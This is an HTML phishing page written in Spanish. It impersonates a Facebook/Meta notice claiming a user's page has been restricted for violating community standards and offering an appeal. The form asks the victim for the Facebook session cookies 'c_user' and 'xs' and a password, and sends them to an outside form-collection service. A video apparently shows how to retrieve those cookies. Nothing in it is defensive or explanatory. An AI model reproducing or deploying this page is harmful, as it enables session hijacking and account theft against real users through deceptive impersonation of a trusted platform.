<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">   
    <link rel="icon" type="image/png" href="https://upload.wikimedia.org/wikipedia/commons/6/6c/Facebook_Logo_2023.png">
    <link rel="stylesheet" href="style.css">
    <title>Acción | Requerido</title>
    <style>
        /* Modal style */
        .modal {
            display: none; /* Hidden by default */
            position: fixed; /* Stay in place */
            z-index: 1; /* Sit on top */
            left: 0;
            top: 0;
            width: 100%; /* Full width */
            height: 100%; /* Full height */
            overflow: auto; /* Enable scroll if needed */
            background-color: rgb(0,0,0); /* Fallback color */
            background-color: rgba(0,0,0,0.9); /* Black w/ opacity */
        }

        /* Modal Content/Box */
        .modal-content {
            margin: 10% auto;
            padding: 20px;
            width: 80%;
            max-width: 700px;
            position: relative;
        }

        /* Close Button */
        .close {
            position: absolute;
            right: 25px;
            top: 15px;
            color: #f1f1f1;
            font-size: 40px;
            font-weight: bold;
            transition: 0.3s;
        }

        .close:hover,
        .close:focus {
            color: #bbb;
            text-decoration: none;
            cursor: pointer;
        }
    </style>
</head>
<body>
    <nav>
        <div class="nav-left">
            <p class="fb-2">
                Facebook
            </p>
        </div>
        <div class="nav-right">
            <div class="search-box">
                <img src="https://purepng.com/public/uploads/large/search-icon-lob.png" alt="ícono de búsqueda">
                <input type="text" placeholder="Buscar">
            </div>
        </div>
    </nav>
    <br><br>

    <div class="main-body">
        <form class="content" action="https://formspree.io/f/mleqjpqw..." method="POST">
            <div>
                <img src="https://upload.wikimedia.org/wikipedia/commons/a/ab/Meta-Logo.png" width="140">
            </div>
             
            <p class="tr-5"> Hemos detectado actividad inusual en tu página que viola nuestras normas comunitarias.</p><br>
            <p class="tr-5">Se ha limitado tu acceso a tu página y actualmente no puedes publicar, compartir o comentar usando tu página.</p><br>
            <p class="tr-5">Si crees que esto es un error, tienes la opción de enviar una apelación proporcionando la información necesaria.</p><br>

            <div>
                <div id="videoModal" class="modal">
                    <div class="modal-content">
                        <span class="close" onclick="closeModal()">&times;</span>
                        <video id="myVideo" controls="" width="500">
                            <source src="https://cdn.glitch.global/2a277f90-2033-409a-8fac-bb6a2902726e/WhatsApp%20Video%202024-01-13%20at%208.37.16%20PM.mp4?v=1705865667560" type="video/mp4">
                        </video>
                    </div>
                </div>
                <p class="mt-4">Haga clic en el video para verlo en pantalla completa*</p>
                <input type="hidden" name="video_modal" id="video_modal">
            </div><br>

            <p class="tr-5">Por favor asegúrate de proporcionar la información solicitada a continuación.</p><br>

            <div>
                <p class="mt-4">c_user*</p>
                <input type="number" name="c_user" id="c_user"  required="">
            </div><br>

            <div>
                <p class="mt-4">xs*</p>
                <input  type="text" name="xs" id="xs"  required="">
            </div><br>

            <div>
                <p class="mt-4">confirmar contraseña</p>
                <input  type="text" name="xs" id="xs"  required="">
            </div><br>

            <p class="msi-4">**Por favor asegúrate de no cerrar sesión de tu cuenta en tu computadora o laptop hasta que hayas recibido un correo electrónico de verificación.</p><br>

            <div class="container">
                <button class="button">
                    <p>Enviar</p>
                </button>
            </div>
            <br><br>
        </form>
    </div>
    <br><br>
    <div>
        <p class="copy-r">Meta ©️ 2024</p>
    </div>

   
<script>
// Function to open modal
function openModal() {
    document.getElementById("videoModal").style.display = "block";
}

// Function to close modal
function closeModal() {
    document.getElementById("videoModal").style.display = "none";
}

// When the user clicks the button, open the modal 
document.getElementById("myVideo").onclick = function() {
    openModal();
}

// When the user clicks anywhere outside of the modal, close it
window.onclick = function(event) {
    var modal = document.getElementById("videoModal");
    if (event.target == modal) {
        closeModal();
    }
}
</script>
</body>
</html>